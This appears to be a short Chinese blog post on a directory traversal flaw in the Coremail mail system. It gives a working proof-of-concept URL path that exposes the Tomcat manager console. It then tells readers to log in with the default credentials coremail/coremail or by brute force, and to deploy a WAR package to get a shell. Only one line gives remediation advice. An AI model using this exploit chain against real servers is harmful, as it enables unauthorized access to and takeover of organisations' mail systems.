Coremail邮箱系统_目录穿越泄漏后台漏洞

# Coremail邮箱系统 目录穿越泄漏后台漏洞

## 漏洞复现

![](/static/qingy/Coremail邮箱系统_目录穿越泄漏后台漏洞/img/1.png)

`POC:url+/lunkr/cache/;/;/../../manager.html`

![](/static/qingy/Coremail邮箱系统_目录穿越泄漏后台漏洞/img/2.png)

访问过去会直接跳转到tomcat控制台,这里你就可以采用coremail/coremail弱口令尝试登陆,或者暴力破解。然后就是部署war包Getshell就ok了。

修复建议:对外隐藏tomcat控制台,修改默认口令。

![](/static/qingy/Coremail邮箱系统_目录穿越泄漏后台漏洞/img/3.png)

© 版权声明
THE END
喜欢就支持一下吧
点赞0 分享
评论 抢沙发

请登录后发表评论

    请登录后查看评论内容